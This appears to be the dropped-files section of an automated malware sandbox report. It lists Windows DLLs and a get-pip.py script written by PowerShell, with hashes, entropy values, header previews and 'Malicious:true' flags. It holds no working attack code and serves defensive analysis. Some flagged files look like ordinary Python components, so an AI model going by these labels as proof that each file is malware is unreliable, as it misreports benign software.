                                                                                                                                                                                                                              SHA-512:BADEB99795B89BC7C1F0C36BECC7A0B2CE99ECFD6F6BB493BDA24B8E57E6712E23F4C509C96A28BC05200910BEDDC9F1536416BBC922331CAE698E813CBB50B3
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MRu.MRu.MRu.D*..IRu.K.t.ORu.K.p.ARu.K.q.ERu.K.v.NRu.".t.NRu..*t.ORu.MRt.(Ru.".x.wRu.".u.LRu."..LRu.".w.LRu.RichMRu.........................PE..d....K.f.........." ...&.f...........8..............................................`3....`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text....d.......f.................. ..`.rdata..............j..............@..@.data...h....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44824
                                                                                                                                                                                                                              Entropy (8bit):6.251859814548239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:pbOF2BJ/zpEZ0mQuJKfPxoUAIZdeoLuM3mdYV9V50R+ya9IjCGhy5YiSyv49AMx/:FtdhRuJKfpmGV9V50RY9IjCGhw7SyOx/
                                                                                                                                                                                                                              MD5:88D20E77E718FF62CE5F01BC6CBCEB88
                                                                                                                                                                                                                              SHA1:8FE2A1FEED9A7D16DC61E7DED17F16080E43393F
                                                                                                                                                                                                                              SHA-256:003F06B975E311A9725DBD53B199D42DFF25DF7F8B3AB93BB1AF56C321865FE0
                                                                                                                                                                                                                              SHA-512:133DFBB4936CAAA3DA63EC515CE7431DBD3AAF81C405E86EE4FFDA23B6526287F71E5DB8914152110E1F8557B408497013905BE0B200BAA7CEA3F1E5359D623A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............s.M.s.M.s.M..|M.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M.s.M.s.M...L.s.M...L.s.M...M.s.M...L.s.MRich.s.M........PE..d...}K.f.........." ...&.....T.......2..............................................d.....`.........................................@b..H....b.........................../...........W..T............................V..@............@...............................text....-.......................... ..`.rdata.......@...0...2..............@..@.data... ....p.......b..............@....pdata...............n..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35096
                                                                                                                                                                                                                              Entropy (8bit):6.457363388284004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:eovdQkOU3QzbxQ0zTdFIjWtJ5YiSyv3ORAMxkEW:3lNynxQ0zTdFIjWtX7Sy25xS
                                                                                                                                                                                                                              MD5:A4281E383EF82C482C8BDA50504BE04A
                                                                                                                                                                                                                              SHA1:4945A2998F9C9F8CE1C078395FFBEDB29C715D5D
                                                                                                                                                                                                                              SHA-256:467B0FEF42D70B55ABF41D817DFF7631FAEEF84DCE64F8AADB5690A22808D40C
                                                                                                                                                                                                                              SHA-512:661E38B74F8BFDD14E48E65EE060DA8ECDF67C0E3CA1B41B6B835339AB8259F55949C1F8685102FD950BF5DE11A1B7C263DA8A3A4B411F1F316376B8AA4A5683
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......de.* ..y ..y ..y)|Fy"..y&..x"..y&..x-..y&..x(..y&..x#..yO..x"..y ..yB..yk|.x%..yO..x"..yO..x!..yO.*y!..yO..x!..yRich ..y........................PE..d...}K.f.........." ...&.....>......L...............................................=.....`.........................................0E..`....E..x............p.......Z.../...........4..T............................3..@............0...............................text............................... ..`.rdata..r ...0..."..."..............@..@.data...X....`.......D..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):55576
                                                                                                                                                                                                                              Entropy (8bit):6.346382537794332
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:uQhEhW1pnYGdvTn9gwxevWdmS5oZdCzZIjXtn5YiSyv3AMxkEDJ:JKhmnT9gwxeMuZdqZIjXt57SyfxR
                                                                                                                                                                                                                              MD5:BA368245D104B1E016D45E96A54DD9CE
                                                                                                                                                                                                                              SHA1:B79EF0EB9557A0C7FA78B11997DE0BB057AB0C52
                                                                                                                                                                                                                              SHA-256:67E6CA6F1645C6928ADE6718DB28AFF1C49A192E8811732B5E99364991102615
                                                                                                                                                                                                                              SHA-512:429D7A1F829BE98C28E3DCA5991EDCADFF17E91F050D50B608A52EF39F6F1C6B36AB71BFA8E3884167371A4E40348A8CDA1A9492B125FB19D1A97C0CCB8F2C7B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.{.2.(.2.(.2.(.J.(.2.(...).2.(...).2.(...).2.(...).2.(..).2.(.2.(.2.(.J.).2.(.J.).2.(..).2.(..).2.(.g(.2.(..).2.(Rich.2.(........PE..d...}K.f.........." ...&.L...`............................................................`.............................................X.............................../......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):32536
                                                                                                                                                                                                                              Entropy (8bit):6.462349221807228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:DJ2Y6rwM5MoOhIjQUl5YiSyvwSAMxkEBo:DmwDoOhIjQUr7Syrxm
                                                                                                                                                                                                                              MD5:6E0CB85DC94E351474D7625F63E49B22
                                                                                                                                                                                                                              SHA1:66737402F76862EB2278E822B94E0D12DCB063C5
                                                                                                                                                                                                                              SHA-256:3F57F29ABD86D4DC8F4CA6C3F190EBB57D429143D98F0636FF5117E08ED81F9B
                                                                                                                                                                                                                              SHA-512:1984B2FC7F9BBDF5BA66716FC60DCFD237F38E2680F2FC61F141FF7E865C0DBDD7CDC47B3BC490B426C6CFE9F3F9E340963ABF428EA79EB794B0BE7D13001F6A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..................PE..d....K.f.........." ...&.....8......................................................\]....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83224
                                                                                                                                                                                                                              Entropy (8bit):6.336512797446254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:rGkFyhCF5VK8+1j50VnWZyJwe9/s+S+pzj18/n1IsJw4YhIjLwYX7Sy4xU:rsYn1qFyJwe9/sT+pzjU1IwwDhIjLwaT
                                                                                                                                                                                                                              MD5:DC06F8D5508BE059EAE9E29D5BA7E9EC
                                                                                                                                                                                                                              SHA1:D666C88979075D3B0C6FD3BE7C595E83E0CB4E82
                                                                                                                                                                                                                              SHA-256:7DAFF6AA3851A913ED97995702A5DFB8A27CB7CF00FB496597BE777228D7564A
                                                                                                                                                                                                                              SHA-512:57EB36BC1E9BE20C85C34B0A535B2349CB13405D60E752016E23603C4648939F1150E4DBEBC01EC7B43EB1A6947C182CCB8A806E7E72167AD2E9D98D1FD94AB3
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.i....}...}...}..}...}.0.|...}.0.|...}.0.|...}.0.|...}o0.|...}...}...}K..|...}o0.|...}o0.|...}o0.}...}o0.|...}Rich...}........PE..d....K.f.........." ...&.v...........-.......................................`............`.............................................P............@.......0.........../...P..........T...............................@............................................text....u.......v.................. ..`.rdata...x.......z...z..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):124696
                                                                                                                                                                                                                              Entropy (8bit):6.265772425588066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:FjIi9Hn059jiS4QzmCO4w5ybxNfgyjU8URVIjOQuU:HHfQz5C5udgZ8URo
                                                                                                                                                                                                                              MD5:29464D52BA96BB11DBDCCBB7D1E067B4
                                                                                                                                                                                                                              SHA1:D6A288E68F54FB3F3B38769F271BF885FD30CBF6
                                                                                                                                                                                                                              SHA-256:3E96CD9E8ABBEA5C6B11EE91301D147F3E416AC6C22EB53123EAEAE51592D2FE
                                                                                                                                                                                                                              SHA-512:3191980CDF4AB34E0D53BA18E609804C312348DA5B79B7242366B9E3BE7299564BC1EC08F549598041D434C9C5D27684349EFF0EAA45F8FA66A02DD02F97862B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~..~..~...P..~.....~...>..~.....~.....~......~.....~.....~..~........~.....~...<..~......~.Rich.~.........PE..d....K.f.........." ...&............|...............................................Ze....`..........................................o..P....p..................h......../.......... ...T...............................@............................................text............................... ..`.rdata.............................@..@.data...x............|..............@....pdata..h...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178456
                                                                                                                                                                                                                              Entropy (8bit):5.9718801387586655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:O8+XyuR9hsQD3O2AfZ6XiBgJpH2GvMW1ba+VRJNI7IM/H9o/PCrXuI6l9IjC7hV0:AXyOrsayZ6XiBGMWjT1lI
                                                                                                                                                                                                                              MD5:5B9B3F978D07E5A9D701F832463FC29D
                                                                                                                                                                                                                              SHA1:0FCD7342772AD0797C9CB891BF17E6A10C2B155B
                                                                                                                                                                                                                              SHA-256:D568B3C99BF0FC35A1F3C5F66B4A9D3B67E23A1D3CF0A4D30499D924D805F5AA
                                                                                                                                                                                                                              SHA-512:E4DB56C8E0E9BA0DB7004463BF30364A4E4AB0B545FB09F40D2DBA67B79B6B1C1DB07DF1F017501E074ABD454D1E37A4167F29E7BBB0D4F8958FA0A2E9F4E405
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d....K.f.........." ...&............X,..............................................c:....`.............................................d...D...................P......../......x.......T...........................@...@............................................text...$........................... ..`.rdata...#.......$..................@..@.data...h...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25368
                                                                                                                                                                                                                              Entropy (8bit):6.6236814553037
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:7ZLWqLE/t8XkiQ19IjZwa3HQIYiSy1pCQrlUJkAM+o/8E9VF0NyMx:7fLa9X19IjZwi5YiSyvJUCAMxkEW
                                                                                                                                                                                                                              MD5:353E11301EA38261E6B1CB261A81E0FE
                                                                                                                                                                                                                              SHA1:607C5EBE67E29EABC61978FB52E4EC23B9A3348E
                                                                                                                                                                                                                              SHA-256:D132F754471BD8A6F6D7816453C2E542F250A4D8089B657392FE61A500AE7899
                                                                                                                                                                                                                              SHA-512:FA990B3E9619D59AE3AD0AEFFCA7A3513AB143BFD0AC9277E711519010F7C453258A4B041BE86A275F3C365E980FC857C23563F3B393D1E3A223973A673E88C5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..p2..#2..#2..#;..#0..#4 ."0..#4 .">..#4 .":..#4 ."1..#] ."0..#y."7..#2..#...#] ."3..#] ."3..#] d#3..#] ."3..#Rich2..#................PE..d....K.f.........." ...&.....&...............................................p............`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...H........................... ..`.rdata....... ......................@..@.data...X....0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36632
                                                                                                                                                                                                                              Entropy (8bit):6.3757770375418374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:1q4nnHFAX6wpFWN5k509IjCi85YiSyv9AMxkEga+:1hnlmTpFWN5k509IjCiG7SyNxEa+
                                                                                                                                                                                                                              MD5:7EC3FC12C75268972078B1C50C133E9B
                                                                                                                                                                                                                              SHA1:73F9CF237FE773178A997AD8EC6CD3AC0757C71E
                                                                                                                                                                                                                              SHA-256:1A105311A5ED88A31472B141B4B6DAA388A1CD359FE705D9A7A4ABA793C5749F
                                                                                                                                                                                                                              SHA-512:441F18E8CE07498BC65575E1AE86C1636E1CEB126AF937E2547710131376BE7B4CB0792403409A81B5C6D897B239F26EC9F36388069E324249778A052746795E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]lr.<.!.<.!.<.!.D.!.<.!... .<.!... .<.!... .<.!.. .<.!... .<.!.D. .<.!.<.!.<.!.D. .<.!.. .<.!.. .<.!..!.<.!.. .<.!Rich.<.!........................PE..d....K.f.........." ...&.(...:.......&.............................................._.....`..........................................U..H....V...............p..`....`.../......t...TG..T............................C..@............@.......S..@....................text....&.......(.................. ..`.rdata.......@... ...,..............@..@.data........`.......L..............@....pdata..`....p.......P..............@..@.rsrc................T..............@..@.reloc..t............^..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):47896
                                                                                                                                                                                                                              Entropy (8bit):6.521879412925506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:d6TRBtwomsngoQ2aHkXedUEJkHkw4z3QVVIj9X1K5YiSyvo5AMxkEG/:8ftwrroQfHkXedUEJkHkw4zAVVIj9X1g
                                                                                                                                                                                                                              MD5:60432D8A7EB836CC7919789CDF77EC98
                                                                                                                                                                                                                              SHA1:B8465817E28F53CB1706F49D86A86D91376CAD10
                                                                                                                                                                                                                              SHA-256:EDB5FEC1B18C7B657DB1A20666896B51FC2D779AE315427ED920BA493038D327
                                                                                                                                                                                                                              SHA-512:7D3901B9878C93B881DC925FBCD88CE7308356C38E657F3B47E10E046B4473D16C03DBA8B7EF7F93C2B9C12C044609A073B4BDFA93257972E10A1DE216DC305F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.4...Z...Z...Z.......Z..n[...Z..n_...Z..n^...Z..nY...Z.qn[...Z.U.[...Z...[.~.Z.qnR...Z.qnZ...Z.qn....Z.qnX...Z.Rich..Z.........PE..d...yK.f.........." ...&.J...F.......N....................................................`..........................................z..T...dz..x...............d......../...........n..T...........................Pm..@............`...............................text....H.......J.................. ..`.rdata...%...`...&...N..............@..@.data... ............t..............@....pdata..d............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2635835
                                                                                                                                                                                                                              Entropy (8bit):6.427118843362935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:m3fHfb1Ll45ds8Eeu5zBNMHXJq2kC3IuEzH:mPxLl45qeGQZRIuE
                                                                                                                                                                                                                              MD5:874058AF7B4F5C0DD158A6E2AC5CDDEE
                                                                                                                                                                                                                              SHA1:8AEBD727FDC7CC6185234BC5E7F37FCC64DF3FCA
                                                                                                                                                                                                                              SHA-256:DFE9FD5C28DC98B5AC17979A953EA550CEC37AE1B47A5116007395BFACFF2AB9
                                                                                                                                                                                                                              SHA-512:BBFF57368CFC59CD488BF942C53C83F857CDF60CF1BEEFFA0D4C8F04479D10536DDA93F7E5ABE94A7193D63B8A84BA646509EB684BF1B276233B79AE09371F3F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#!/usr/bin/env python.#.# Hi There!.#.# You may be wondering what this giant blob of binary data here is, you might.# even be worried that we're up to something nefarious (good for you for being.# paranoid!). This is a base85 encoding of a zip file, this zip file contains.# an entire copy of pip (version 24.0)..#.# Pip is a thing that installs packages, pip itself is a package that someone.# might want to install, especially if they're looking to run this get-pip.py.# script. Pip has a lot of code to deal with the security of installing.# packages, various edge cases on various platforms, and other such sort of.# "tribal knowledge" that has been encoded in its code base. Because of this.# we basically include an entire copy of pip inside this blob. We do this.# because the alternatives are attempt to implement a "minipip" that probably.# doesn't do things correctly and has weird edge cases, or compress pip itself.# down into a single file..#.# If you're wondering how this is created, i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                                              Entropy (8bit):6.576230704358061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:vNnMgHqxp1GPn5hIjQGl5YiSyv38aAMxkE7:vNnMgKxp1U5hIjQGr7Sy/8Yxn
                                                                                                                                                                                                                              MD5:92B440CA45447EC33E884752E4C65B07
                                                                                                                                                                                                                              SHA1:5477E21BB511CC33C988140521A4F8C11A427BCC
                                                                                                                                                                                                                              SHA-256:680DF34FB908C49410AC5F68A8C05D92858ACD111E62D1194D15BDCE520BD6C3
                                                                                                                                                                                                                              SHA-512:40E60E1D1445592C5E8EB352A4052DB28B1739A29E16B884B0BA15917B058E66196988214CE473BA158704837B101A13195D5E48CB1DC2F07262DFECFE8D8191
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...X....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1540888
                                                                                                                                                                                                                              Entropy (8bit):6.584272141791991
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:3zx+dvHgdXZW1s4gLLk56J0s3XyBh4mqWvqS/cm4ynZ3YShXkMEKB:7pW1cd0s3CMmqWSS/ci3YSmU
                                                                                                                                                                                                                              MD5:612FC8A817C5FAA9CB5E89B0D4096216
                                                                                                                                                                                                                              SHA1:C8189CBB846F9A77F1AE67F3BD6B71B6363B9562
                                                                                                                                                                                                                              SHA-256:7DA1C4604FC97BA033830A2703D92BB6D10A9BBA201EC64D13D5CCBFECD57D49
                                                                                                                                                                                                                              SHA-512:8A4A751AF7611651D8D48A894C0D67EB67D5C22557BA4DDD298909DD4FB05F5D010FE785019AF06E6CA2E406753342C54668E9C4E976BAF758EE952834F8A237
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....,............................................................`..............................................#...........`..........h....T.../...p..\......T...............................@............@..X............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...PM...0...D..................@....pdata..h............\..............@..@.rsrc........`.......:..............@..@.reloc..\....p.......D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1137944
                                                                                                                                                                                                                              Entropy (8bit):5.462087550450309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:/rEHdcM6hb4CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciQn:/rEXtCjfk7bPNfv42BN6yzUiQn
                                                                                                                                                                                                                              MD5:16BE9A6F941F1A2CB6B5FCA766309B2C
                                                                                                                                                                                                                              SHA1:17B23AE0E6A11D5B8159C748073E36A936F3316A
                                                                                                                                                                                                                              SHA-256:10FFD5207EEFF5A836B330B237D766365D746C30E01ABF0FD01F78548D1F1B04
                                                                                                                                                                                                                              SHA-512:64B7ECC58AE7CF128F03A0D5D5428AAA0D4AD4AE7E7D19BE0EA819BBBF99503836BFE4946DF8EE3AB8A92331FDD002AB9A9DE5146AF3E86FEF789CE46810796B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.>..........\*.......................................p.......Q....`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                                              Entropy (8bit):6.443672733968568
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cV3z1H3uX2AFIPUVIjO7GFq5YiSyvwUAMxkER2:UBXiIPUVIjO70o7SyHxt2
                                                                                                                                                                                                                              MD5:F4EFDE2CA920A52135B00BF8F0545A87
                                                                                                                                                                                                                              SHA1:352E5EA2419BA876FB80E0D0D1E5DD12272A33E4
                                                                                                                                                                                                                              SHA-256:9885B3D18903A2EF27428C7C9760493111CC97330FF0AFCB57199964092E86BF
                                                                                                                                                                                                                              SHA-512:F098AF2851BE213F83D19C0AA0CA82DED7BC41F51793502B9BED32D185B73B9CC8A9B29E25B3C5847B237AA466B14088E577F05B6BD03046AA65EDB25C087E8D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N.J. TJ. TJ. TC.TH. TL.!UH. TL.%UA. TL.$UB. TL.#UI. T%.!UH. T..!UM. TJ.!Tp. T%.(UK. T%. UK. T%..TK. T%."UK. TRichJ. T........................PE..d....K.f.........." ...&.....4.......................................................!....`..........................................A..P....B.......p.......`..p....H.../......d....:..T............................9..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..d............F..............@..B................................................................................................................................................................................................................................
